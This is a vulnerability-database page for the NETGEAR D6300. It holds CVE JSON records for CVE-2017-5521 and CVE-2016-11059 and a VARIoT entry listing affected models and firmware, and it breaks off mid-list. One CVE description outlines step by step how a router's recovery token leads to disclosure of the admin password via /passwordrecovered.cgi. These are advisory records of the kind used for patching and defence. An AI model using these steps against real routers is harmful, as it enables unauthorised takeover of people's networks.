All the vulnerabilites related to netgear - d6300
cve-2017-5521
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.exploit-db.com/exploits/41205/ | exploit, x_refsource_EXPLOIT-DB | |
http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability | x_refsource_CONFIRM | |
http://www.securityfocus.com/bid/95457 | vdb-entry, x_refsource_BID |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T15:04:14.997Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "41205", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/41205/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability" }, { "name": "95457", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/95457" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2017-01-17T00:00:00", "descriptions": [ { "lang": "en", "value": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "41205", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/41205/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability" }, { "name": "95457", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/95457" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2017-5521", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "41205", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/41205/" }, { "name": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability", "refsource": "CONFIRM", "url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability" }, { "name": "95457", "refsource": "BID", "url": "http://www.securityfocus.com/bid/95457" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2017-5521", "datePublished": "2017-01-17T09:22:00", "dateReserved": "2017-01-17T00:00:00", "dateUpdated": "2024-08-05T15:04:14.997Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-11059
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T03:47:34.858Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2017-01-06T00:00:00", "descriptions": [ { "lang": "en", "value": "Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-28T16:20:22", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2016-11059", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers", "refsource": "CONFIRM", "url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2016-11059", "datePublished": "2020-04-28T16:20:22", "dateReserved": "2020-04-27T00:00:00", "dateUpdated": "2024-08-06T03:47:34.858Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
var-202004-1262
Vulnerability from variot
Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. This affects AC1450 prior to 2017-01-06, C6300 prior to 2017-01-06, D500 prior to 2017-01-06, D1500 prior to 2017-01-06, D3600 prior to 2017-01-06, D6000 prior to 2017-01-06, D6100 prior to 2017-01-06, D6200 prior to 2017-01-06, D6200B prior to 2017-01-06, D6300B prior to 2017-01-06, D6300 prior to 2017-01-06, DGN1000v3 prior to 2017-01-06, DGN2200v1 prior to 2017-01-06, DGN2200v3 prior to 2017-01-06, DGN2200V4 prior to 2017-01-06, DGN2200Bv3 prior to 2017-01-06, DGN2200Bv4 prior to 2017-01-06, DGND3700v1 prior to 2017-01-06, DGND3700v2 prior to 2017-01-06, DGND3700Bv2 prior to 2017-01-06, JNR1010v1 prior to 2017-01-06, JNR1010v2 prior to 2017-01-06, JNR3300 prior to 2017-01-06, JR6100 prior to 2017-01-06, JR6150 prior to 2017-01-06, JWNR2000v5 prior to 2017-01-06, R2000 prior to 2017-01-06, R6050 prior to 2017-01-06, R6100 prior to 2017-01-06, R6200 prior to 2017-01-06, R6200v2 prior to 2017-01-06, R6220 prior to 2017-01-06, R6250 prior to 2017-01-06, R6300 prior to 2017-01-06, R6300v2 prior to 2017-01-06, R6700 prior to 2017-01-06, R7000 prior to 2017-01-06, R7900 prior to 2017-01-06, R7500 prior to 2017-01-06, R8000 prior to 2017-01-06, WGR614v10 prior to 2017-01-06, WNR1000v2 prior to 2017-01-06, WNR1000v3 prior to 2017-01-06, WNR1000v4 prior to 2017-01-06, WNR2000v3 prior to 2017-01-06, WNR2000v4 prior to 2017-01-06, WNR2000v5 prior to 2017-01-06, WNR2200 prior to 2017-01-06, WNR2500 prior to 2017-01-06, WNR3500Lv2 prior to 2017-01-06, WNDR3400v2 prior to 2017-01-06, WNDR3400v3 prior to 2017-01-06, WNDR3700v3 prior to 2017-01-06, WNDR3700v4 prior to 2017-01-06, WNDR3700v5 prior to 2017-01-06, WNDR4300 prior to 2017-01-06, WNDR4300v2 prior to 2017-01-06, WNDR4500v1 prior to 2017-01-06, WNDR4500v2 prior to 2017-01-06, and WNDR4500v3 prior to 2017-01-06
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202004-1262", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "r6050", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "dgn2200b", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "dgn2200", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r7500", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wndr3400", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d6000", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r6700", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wndr3700", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d6200b", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "jnr3300", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r6200", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d6100", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "dgnd3700b", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "ac1450", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "jr6100", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r6220", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wndr4500", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "jwnr2000", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wnr2000", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "c6300", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r8000", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "jnr1010", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wndr4300", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wnr2500", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r6100", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r7900", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d6200", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "jr6150", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r7000", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r6300", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d6300", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "dgnd3700", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wnr1000", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r2000", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d1500", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "r6250", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d500", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wnr2200", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d3600", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "dgn1000", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "d6300b", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wgr614", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "wnr3500l", "scope": "lt", "trust": 1.0, "vendor": "netgear", "version": "2017-01-06" }, { "model": "ac1450", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "c6300", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d1500", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d3600", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d500", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d6000", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d6100", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d6200", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d6200b", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d6300", "scope": "eq", "trust": 0.8, "vendor": "netgear", "version": "2017/01/06" }, { "model": "d3600", "scope": "eq", "trust": 0.2, "vendor": "netgear", "version": "1.0.0.49" }, { "model": "ac1450", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "ac1450", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.36" }, { "model": "d1500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.20" }, { "model": "d1500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.25" }, { "model": "d1500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.27" }, { "model": "d3600", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "d3600", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.61" }, { "model": "d3600", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.67" }, { "model": "d3600", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.68" }, { "model": "d3600", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.72" }, { "model": "d3600", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.76" }, { "model": "d500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.25" }, { "model": "d500", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.27" }, { "model": "d6000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "d6000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.49" }, { "model": "d6000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.61" }, { "model": "d6000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.67" }, { "model": "d6000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.68" }, { "model": "d6000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.72" }, { "model": "d6000", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.76" }, { "model": "d6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.50 0.0.50" }, { "model": "d6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.55" }, { "model": "d6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.56" }, { "model": "d6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.57" }, { "model": "d6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.58" }, { "model": "d6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.63" }, { "model": "d6200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.00.24" }, { "model": "d6200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.00.28" }, { "model": "d6200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.00.30" }, { "model": "d6200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.00.32" }, { "model": "d6200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.00.34" }, { "model": "d6200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.00.36" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.55" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.58" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.82" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.86" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.94" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.96" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.102" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.106" }, { "model": "dgn2200", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.110" }, { "model": "dgn2200b", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "dgn2200b", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.58" }, { "model": "dgn2200b", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.82" }, { "model": "dgn2200b", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.94" }, { "model": "dgn2200b", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.96" }, { "model": "dgn2200b", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.102" }, { "model": "dgnd3700", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": null }, { "model": "jnr1010", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.32" }, { "model": "jnr1010", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.40" }, { "model": "jnr1010", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.42" }, { "model": "jnr1010", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.44" }, { "model": "jnr1010", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.46" }, { "model": "jnr1010", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.48" }, { "model": "jnr1010", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.50" }, { "model": "jnr1010", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.1.0.54" }, { "model": "jr6150", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.17" }, { "model": "jr6150", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.7" }, { "model": "jr6150", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.10" }, { "model": "jr6150", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.12" }, { "model": "jr6150", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.14" }, { "model": "jr6150", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.16" }, { "model": "jr6150", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.18" }, { "model": "jr6150", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.24" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.0.86" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.7" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.10" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.10j" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.12" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.14" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.16" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.18" }, { "model": "r6050", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.24" }, { "model": "r6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.1" }, { "model": "r6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.12" }, { "model": "r6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.14" }, { "model": "r6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.16" }, { "model": "r6100", "scope": "eq", "trust": 0.1, "vendor": "netgear", "version": "1.0.1.20" }, { "model": 